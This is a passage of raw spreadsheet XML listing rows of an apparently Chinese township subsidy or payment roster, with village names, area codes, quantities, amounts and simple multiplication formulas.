      <c r="D2082" s="13" t="s">
        <v>5512</v>
      </c>
      <c r="E2082" s="13" t="s">
        <v>5004</v>
      </c>
      <c r="F2082" s="14" t="str">
        <f>F2081</f>
        <v>4113210615</v>
      </c>
      <c r="G2082" s="14"/>
      <c r="H2082" s="14"/>
      <c r="I2082" s="14"/>
      <c r="J2082" s="14"/>
      <c r="K2082" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2083" ht="23" customHeight="1" spans="1:11">
      <c r="A2083" s="13" t="s">
        <v>5513</v>
      </c>
      <c r="B2083" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2083" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2083" s="14" t="s">
        <v>5514</v>
      </c>
      <c r="E2083" s="14" t="s">
        <v>4911</v>
      </c>
      <c r="F2083" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2083" s="14">
        <v>2</v>
      </c>
      <c r="H2083" s="14">
        <v>300</v>
      </c>
      <c r="I2083" s="14">
        <f>H2083*G2083</f>
        <v>600</v>
      </c>
      <c r="J2083" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2083" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2084" ht="23" customHeight="1" spans="1:11">
      <c r="A2084" s="13" t="s">
        <v>5515</v>
      </c>
      <c r="B2084" s="14" t="str">
        <f>B2083</f>
        <v>皇后乡</v>
      </c>
      <c r="C2084" s="14" t="str">
        <f>C2083</f>
        <v>皇后乡</v>
      </c>
      <c r="D2084" s="13" t="s">
        <v>5516</v>
      </c>
      <c r="E2084" s="13" t="s">
        <v>5517</v>
      </c>
      <c r="F2084" s="14" t="str">
        <f>F2083</f>
        <v>4113210615</v>
      </c>
      <c r="G2084" s="14"/>
      <c r="H2084" s="14"/>
      <c r="I2084" s="14"/>
      <c r="J2084" s="14"/>
      <c r="K2084" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2085" ht="23" customHeight="1" spans="1:11">
      <c r="A2085" s="13" t="s">
        <v>5518</v>
      </c>
      <c r="B2085" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2085" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2085" s="14" t="s">
        <v>5519</v>
      </c>
      <c r="E2085" s="14" t="s">
        <v>5022</v>
      </c>
      <c r="F2085" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2085" s="14">
        <v>1</v>
      </c>
      <c r="H2085" s="14">
        <v>340</v>
      </c>
      <c r="I2085" s="14">
        <f t="shared" ref="I2085:I2108" si="103">H2085*G2085</f>
        <v>340</v>
      </c>
      <c r="J2085" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2085" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2086" ht="23" customHeight="1" spans="1:11">
      <c r="A2086" s="13" t="s">
        <v>5520</v>
      </c>
      <c r="B2086" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2086" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2086" s="14" t="s">
        <v>5521</v>
      </c>
      <c r="E2086" s="14" t="s">
        <v>5019</v>
      </c>
      <c r="F2086" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2086" s="14">
        <v>1</v>
      </c>
      <c r="H2086" s="14">
        <v>340</v>
      </c>
      <c r="I2086" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2086" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2086" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2087" ht="23" customHeight="1" spans="1:11">
      <c r="A2087" s="13" t="s">
        <v>5522</v>
      </c>
      <c r="B2087" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2087" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2087" s="14" t="s">
        <v>5523</v>
      </c>
      <c r="E2087" s="14" t="s">
        <v>4911</v>
      </c>
      <c r="F2087" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2087" s="14">
        <v>1</v>
      </c>
      <c r="H2087" s="14">
        <v>340</v>
      </c>
      <c r="I2087" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2087" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2087" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2088" ht="23" customHeight="1" spans="1:11">
      <c r="A2088" s="13" t="s">
        <v>5524</v>
      </c>
      <c r="B2088" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2088" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2088" s="14" t="s">
        <v>5525</v>
      </c>
      <c r="E2088" s="14" t="s">
        <v>5526</v>
      </c>
      <c r="F2088" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2088" s="14">
        <v>1</v>
      </c>
      <c r="H2088" s="14">
        <v>340</v>
      </c>
      <c r="I2088" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2088" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2088" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2089" ht="23" customHeight="1" spans="1:11">
      <c r="A2089" s="13" t="s">
        <v>5527</v>
      </c>
      <c r="B2089" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2089" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2089" s="14" t="s">
        <v>5528</v>
      </c>
      <c r="E2089" s="14" t="s">
        <v>5154</v>
      </c>
      <c r="F2089" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2089" s="14">
        <v>1</v>
      </c>
      <c r="H2089" s="14">
        <v>340</v>
      </c>
      <c r="I2089" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2089" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2089" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2090" ht="23" customHeight="1" spans="1:11">
      <c r="A2090" s="13" t="s">
        <v>5529</v>
      </c>
      <c r="B2090" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2090" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2090" s="14" t="s">
        <v>5530</v>
      </c>
      <c r="E2090" s="14" t="s">
        <v>5098</v>
      </c>
      <c r="F2090" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2090" s="14">
        <v>1</v>
      </c>
      <c r="H2090" s="14">
        <v>340</v>
      </c>
      <c r="I2090" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2090" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2090" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2091" ht="23" customHeight="1" spans="1:11">
      <c r="A2091" s="13" t="s">
        <v>5531</v>
      </c>
      <c r="B2091" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2091" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2091" s="14" t="s">
        <v>5532</v>
      </c>
      <c r="E2091" s="14" t="s">
        <v>2243</v>
      </c>
      <c r="F2091" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2091" s="14">
        <v>1</v>
      </c>
      <c r="H2091" s="14">
        <v>340</v>
      </c>
      <c r="I2091" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2091" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2091" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2092" ht="23" customHeight="1" spans="1:11">
      <c r="A2092" s="13" t="s">
        <v>5533</v>
      </c>
      <c r="B2092" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2092" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2092" s="14" t="s">
        <v>5534</v>
      </c>
      <c r="E2092" s="14" t="s">
        <v>5037</v>
      </c>
      <c r="F2092" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2092" s="14">
        <v>1</v>
      </c>
      <c r="H2092" s="14">
        <v>340</v>
      </c>
      <c r="I2092" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2092" s="14">
        <v>45047</v>
      </c>
      <c r="K2092" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2093" ht="23" customHeight="1" spans="1:11">
      <c r="A2093" s="13" t="s">
        <v>5535</v>
      </c>
      <c r="B2093" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2093" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2093" s="14" t="s">
        <v>5536</v>
      </c>
      <c r="E2093" s="14" t="s">
        <v>4942</v>
      </c>
      <c r="F2093" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2093" s="14">
        <v>1</v>
      </c>
      <c r="H2093" s="14">
        <v>340</v>
      </c>
      <c r="I2093" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2093" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2093" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2094" ht="23" customHeight="1" spans="1:11">
      <c r="A2094" s="13" t="s">
        <v>5537</v>
      </c>
      <c r="B2094" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2094" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2094" s="14" t="s">
        <v>5539</v>
      </c>
      <c r="E2094" s="14" t="s">
        <v>4948</v>
      </c>
      <c r="F2094" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2094" s="14">
        <v>1</v>
      </c>
      <c r="H2094" s="14">
        <v>340</v>
      </c>
      <c r="I2094" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2094" s="24">
        <v>45108</v>
      </c>
      <c r="K2094" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2095" ht="23" customHeight="1" spans="1:11">
      <c r="A2095" s="13" t="s">
        <v>5541</v>
      </c>
      <c r="B2095" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2095" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2095" s="14" t="s">
        <v>5542</v>
      </c>
      <c r="E2095" s="14" t="s">
        <v>5543</v>
      </c>
      <c r="F2095" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2095" s="14">
        <v>1</v>
      </c>
      <c r="H2095" s="14">
        <v>340</v>
      </c>
      <c r="I2095" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2095" s="24">
        <v>45108</v>
      </c>
      <c r="K2095" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2096" ht="23" customHeight="1" spans="1:11">
      <c r="A2096" s="13" t="s">
        <v>5544</v>
      </c>
      <c r="B2096" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2096" s="14" t="s">
        <v>5545</v>
      </c>
      <c r="D2096" s="14" t="s">
        <v>5546</v>
      </c>
      <c r="E2096" s="14" t="s">
        <v>5037</v>
      </c>
      <c r="F2096" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2096" s="14">
        <v>1</v>
      </c>
      <c r="H2096" s="14">
        <v>340</v>
      </c>
      <c r="I2096" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2096" s="24">
        <v>45108</v>
      </c>
      <c r="K2096" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2097" ht="23" customHeight="1" spans="1:11">
      <c r="A2097" s="13" t="s">
        <v>5547</v>
      </c>
      <c r="B2097" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2097" s="14" t="s">
        <v>5545</v>
      </c>
      <c r="D2097" s="14" t="s">
        <v>5548</v>
      </c>
      <c r="E2097" s="14" t="s">
        <v>5549</v>
      </c>
      <c r="F2097" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2097" s="14">
        <v>1</v>
      </c>
      <c r="H2097" s="14">
        <v>340</v>
      </c>
      <c r="I2097" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2097" s="24">
        <v>45108</v>
      </c>
      <c r="K2097" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2098" ht="23" customHeight="1" spans="1:11">
      <c r="A2098" s="13" t="s">
        <v>5550</v>
      </c>
      <c r="B2098" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2098" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2098" s="14" t="s">
        <v>5552</v>
      </c>
      <c r="E2098" s="14" t="s">
        <v>4959</v>
      </c>
      <c r="F2098" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2098" s="14">
        <v>1</v>
      </c>
      <c r="H2098" s="14">
        <v>340</v>
      </c>
      <c r="I2098" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2098" s="24">
        <v>45108</v>
      </c>
      <c r="K2098" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2099" ht="23" customHeight="1" spans="1:11">
      <c r="A2099" s="13" t="s">
        <v>5553</v>
      </c>
      <c r="B2099" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2099" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2099" s="14" t="s">
        <v>5554</v>
      </c>
      <c r="E2099" s="14" t="s">
        <v>5180</v>
      </c>
      <c r="F2099" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2099" s="14">
        <v>1</v>
      </c>
      <c r="H2099" s="14">
        <v>340</v>
      </c>
      <c r="I2099" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2099" s="14">
        <v>45352</v>
      </c>
      <c r="K2099" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2100" ht="23" customHeight="1" spans="1:11">
      <c r="A2100" s="13" t="s">
        <v>5555</v>
      </c>
      <c r="B2100" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2100" s="14" t="s">
        <v>5556</v>
      </c>
      <c r="D2100" s="14" t="s">
        <v>5557</v>
      </c>
      <c r="E2100" s="14" t="s">
        <v>5009</v>
      </c>
      <c r="F2100" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2100" s="14">
        <v>1</v>
      </c>
      <c r="H2100" s="14">
        <v>340</v>
      </c>
      <c r="I2100" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2100" s="14">
        <v>45413</v>
      </c>
      <c r="K2100" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2101" ht="23" customHeight="1" spans="1:11">
      <c r="A2101" s="13" t="s">
        <v>5558</v>
      </c>
      <c r="B2101" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2101" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2101" s="14" t="s">
        <v>5559</v>
      </c>
      <c r="E2101" s="14" t="s">
        <v>5560</v>
      </c>
      <c r="F2101" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2101" s="14">
        <v>1</v>
      </c>
      <c r="H2101" s="14">
        <v>340</v>
      </c>
      <c r="I2101" s="14">
        <f t="shared" si="103"/>
        <v>340</v>
      </c>
      <c r="J2101" s="24">
        <v>45658</v>
      </c>
      <c r="K2101" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2102" ht="23" customHeight="1" spans="1:11">
      <c r="A2102" s="13" t="s">
        <v>5561</v>
      </c>
      <c r="B2102" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2102" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2102" s="14" t="s">
        <v>5562</v>
      </c>
      <c r="E2102" s="14" t="s">
        <v>5563</v>
      </c>
      <c r="F2102" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2102" s="14">
        <v>3</v>
      </c>
      <c r="H2102" s="14">
        <v>265</v>
      </c>
      <c r="I2102" s="14">
        <f t="shared" si="103"/>
        <v>795</v>
      </c>
      <c r="J2102" s="24">
        <v>45108</v>
      </c>
      <c r="K2102" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2103" ht="23" customHeight="1" spans="1:11">
      <c r="A2103" s="13" t="s">
        <v>5564</v>
      </c>
      <c r="B2103" s="14" t="str">
        <f>B2102</f>
        <v>皇后乡</v>
      </c>
      <c r="C2103" s="14" t="str">
        <f>C2102</f>
        <v>县社</v>
      </c>
      <c r="D2103" s="13" t="s">
        <v>5565</v>
      </c>
      <c r="E2103" s="13" t="s">
        <v>3897</v>
      </c>
      <c r="F2103" s="14" t="str">
        <f>F2102</f>
        <v>4113210699</v>
      </c>
      <c r="G2103" s="14"/>
      <c r="H2103" s="14"/>
      <c r="I2103" s="14"/>
      <c r="J2103" s="24"/>
      <c r="K2103" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2104" ht="23" customHeight="1" spans="1:11">
      <c r="A2104" s="13" t="s">
        <v>5566</v>
      </c>
      <c r="B2104" s="14" t="str">
        <f>B2103</f>
        <v>皇后乡</v>
      </c>
      <c r="C2104" s="14" t="str">
        <f>C2103</f>
        <v>县社</v>
      </c>
      <c r="D2104" s="13" t="s">
        <v>5567</v>
      </c>
      <c r="E2104" s="19" t="s">
        <v>5568</v>
      </c>
      <c r="F2104" s="14" t="str">
        <f>F2103</f>
        <v>4113210699</v>
      </c>
      <c r="G2104" s="14"/>
      <c r="H2104" s="14"/>
      <c r="I2104" s="14"/>
      <c r="J2104" s="24"/>
      <c r="K2104" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2105" ht="23" customHeight="1" spans="1:11">
      <c r="A2105" s="13" t="s">
        <v>5569</v>
      </c>
      <c r="B2105" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2105" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2105" s="14" t="s">
        <v>5570</v>
      </c>
      <c r="E2105" s="14" t="s">
        <v>4936</v>
      </c>
      <c r="F2105" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2105" s="14">
        <v>1</v>
      </c>
      <c r="H2105" s="14">
        <v>340</v>
      </c>
      <c r="I2105" s="14">
        <f t="shared" ref="I2105:I2112" si="104">H2105*G2105</f>
        <v>340</v>
      </c>
      <c r="J2105" s="24">
        <v>45108</v>
      </c>
      <c r="K2105" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2106" ht="23" customHeight="1" spans="1:11">
      <c r="A2106" s="13" t="s">
        <v>5571</v>
      </c>
      <c r="B2106" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2106" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2106" s="14" t="s">
        <v>5574</v>
      </c>
      <c r="E2106" s="14" t="s">
        <v>5575</v>
      </c>
      <c r="F2106" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2106" s="14">
        <v>1</v>
      </c>
      <c r="H2106" s="14">
        <v>340</v>
      </c>
      <c r="I2106" s="14">
        <f t="shared" si="104"/>
        <v>340</v>
      </c>
      <c r="J2106" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2106" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2107" ht="23" customHeight="1" spans="1:11">
      <c r="A2107" s="13" t="s">
        <v>5576</v>
      </c>
      <c r="B2107" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2107" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2107" s="14" t="s">
        <v>5577</v>
      </c>
      <c r="E2107" s="14" t="s">
        <v>4526</v>
      </c>
      <c r="F2107" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2107" s="14">
        <v>1</v>
      </c>
      <c r="H2107" s="14">
        <v>340</v>
      </c>
      <c r="I2107" s="14">
        <f t="shared" si="104"/>
        <v>340</v>
      </c>
      <c r="J2107" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2107" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2108" ht="23" customHeight="1" spans="1:11">
      <c r="A2108" s="13" t="s">
        <v>5578</v>
      </c>
      <c r="B2108" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2108" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2108" s="14" t="s">
        <v>5579</v>
      </c>
      <c r="E2108" s="14" t="s">
        <v>5580</v>
      </c>
      <c r="F2108" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2108" s="14">
        <v>1</v>
      </c>
      <c r="H2108" s="14">
        <v>340</v>
      </c>
      <c r="I2108" s="14">
        <f t="shared" si="104"/>
        <v>340</v>
      </c>
      <c r="J2108" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2108" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2109" ht="23" customHeight="1" spans="1:11">
      <c r="A2109" s="13" t="s">
        <v>5581</v>
      </c>
      <c r="B2109" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2109" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2109" s="14" t="s">
        <v>5582</v>
      </c>
      <c r="E2109" s="14" t="s">
        <v>5583</v>
      </c>
      <c r="F2109" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2109" s="14">
        <v>1</v>
      </c>
      <c r="H2109" s="14">
        <v>340</v>
      </c>
      <c r="I2109" s="14">
        <f t="shared" si="104"/>
        <v>340</v>
      </c>
      <c r="J2109" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2109" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2110" ht="23" customHeight="1" spans="1:11">
      <c r="A2110" s="13" t="s">
        <v>5584</v>
      </c>
      <c r="B2110" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2110" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2110" s="14" t="s">
        <v>5585</v>
      </c>
      <c r="E2110" s="14" t="s">
        <v>5248</v>
      </c>
      <c r="F2110" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2110" s="14">
        <v>1</v>
      </c>
      <c r="H2110" s="14">
        <v>340</v>
      </c>
      <c r="I2110" s="14">
        <f t="shared" si="104"/>
        <v>340</v>
      </c>
      <c r="J2110" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2110" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2111" ht="23" customHeight="1" spans="1:11">
      <c r="A2111" s="13" t="s">
        <v>5586</v>
      </c>
      <c r="B2111" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2111" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2111" s="14" t="s">
        <v>5587</v>
      </c>
      <c r="E2111" s="14" t="s">
        <v>5588</v>
      </c>
      <c r="F2111" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2111" s="14">
        <v>1</v>
      </c>
      <c r="H2111" s="14">
        <v>340</v>
      </c>
      <c r="I2111" s="14">
        <f t="shared" si="104"/>
        <v>340</v>
      </c>
      <c r="J2111" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2111" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2112" ht="23" customHeight="1" spans="1:11">
      <c r="A2112" s="13" t="s">
        <v>5589</v>
      </c>
      <c r="B2112" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2112" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2112" s="14" t="s">
        <v>5590</v>
      </c>
      <c r="E2112" s="14" t="s">
        <v>5591</v>
      </c>
      <c r="F2112" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2112" s="14">
        <v>2</v>
      </c>
      <c r="H2112" s="14">
        <v>300</v>
      </c>
      <c r="I2112" s="14">
        <f t="shared" si="104"/>
        <v>600</v>
      </c>
      <c r="J2112" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2112" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2113" ht="23" customHeight="1" spans="1:11">
      <c r="A2113" s="13" t="s">
        <v>5592</v>
      </c>
      <c r="B2113" s="14" t="str">
        <f>B2112</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2113" s="14" t="str">
        <f>C2112</f>
        <v>毛庄村</v>
      </c>
      <c r="D2113" s="13" t="s">
        <v>5593</v>
      </c>
      <c r="E2113" s="13" t="s">
        <v>5594</v>
      </c>
      <c r="F2113" s="14">
        <f>F2112</f>
        <v>4113210704</v>
      </c>
      <c r="G2113" s="14"/>
      <c r="H2113" s="14"/>
      <c r="I2113" s="14"/>
      <c r="J2113" s="14"/>
      <c r="K2113" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2114" ht="23" customHeight="1" spans="1:11">
      <c r="A2114" s="13" t="s">
        <v>5595</v>
      </c>
      <c r="B2114" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2114" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2114" s="14" t="s">
        <v>5596</v>
      </c>
      <c r="E2114" s="14" t="s">
        <v>5597</v>
      </c>
      <c r="F2114" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2114" s="14">
        <v>1</v>
      </c>
      <c r="H2114" s="14">
        <v>340</v>
      </c>
      <c r="I2114" s="14">
        <f t="shared" ref="I2114:I2126" si="105">H2114*G2114</f>
        <v>340</v>
      </c>
      <c r="J2114" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2114" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2115" ht="23" customHeight="1" spans="1:11">
      <c r="A2115" s="13" t="s">
        <v>5598</v>
      </c>
      <c r="B2115" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2115" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2115" s="14" t="s">
        <v>5599</v>
      </c>
      <c r="E2115" s="14" t="s">
        <v>5600</v>
      </c>
      <c r="F2115" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2115" s="14">
        <v>1</v>
      </c>
      <c r="H2115" s="14">
        <v>340</v>
      </c>
      <c r="I2115" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2115" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2115" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2116" ht="23" customHeight="1" spans="1:11">
      <c r="A2116" s="13" t="s">
        <v>5601</v>
      </c>
      <c r="B2116" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2116" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2116" s="14" t="s">
        <v>5602</v>
      </c>
      <c r="E2116" s="14" t="s">
        <v>2879</v>
      </c>
      <c r="F2116" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2116" s="14">
        <v>1</v>
      </c>
      <c r="H2116" s="14">
        <v>340</v>
      </c>
      <c r="I2116" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2116" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2116" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2117" ht="23" customHeight="1" spans="1:11">
      <c r="A2117" s="13" t="s">
        <v>5603</v>
      </c>
      <c r="B2117" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2117" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2117" s="14" t="s">
        <v>5604</v>
      </c>
      <c r="E2117" s="14" t="s">
        <v>5605</v>
      </c>
      <c r="F2117" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2117" s="14">
        <v>1</v>
      </c>
      <c r="H2117" s="14">
        <v>340</v>
      </c>
      <c r="I2117" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2117" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2117" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2118" ht="23" customHeight="1" spans="1:11">
      <c r="A2118" s="13" t="s">
        <v>5606</v>
      </c>
      <c r="B2118" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2118" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2118" s="14" t="s">
        <v>5607</v>
      </c>
      <c r="E2118" s="14" t="s">
        <v>5575</v>
      </c>
      <c r="F2118" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2118" s="14">
        <v>1</v>
      </c>
      <c r="H2118" s="14">
        <v>340</v>
      </c>
      <c r="I2118" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2118" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2118" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2119" ht="23" customHeight="1" spans="1:11">
      <c r="A2119" s="13" t="s">
        <v>5608</v>
      </c>
      <c r="B2119" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2119" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2119" s="14" t="s">
        <v>5609</v>
      </c>
      <c r="E2119" s="14" t="s">
        <v>5610</v>
      </c>
      <c r="F2119" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2119" s="14">
        <v>1</v>
      </c>
      <c r="H2119" s="14">
        <v>340</v>
      </c>
      <c r="I2119" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
      <c r="J2119" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2119" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2120" ht="23" customHeight="1" spans="1:11">
      <c r="A2120" s="13" t="s">
        <v>5611</v>
      </c>
      <c r="B2120" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2120" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2120" s="14" t="s">
        <v>5612</v>
      </c>
      <c r="E2120" s="14" t="s">
        <v>5600</v>
      </c>
      <c r="F2120" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2120" s="14">
        <v>1</v>
      </c>
      <c r="H2120" s="14">
        <v>340</v>
      </c>
      <c r="I2120" s="14">
        <f t="shared" si="105"/>
        <v>340</v>
      </c>
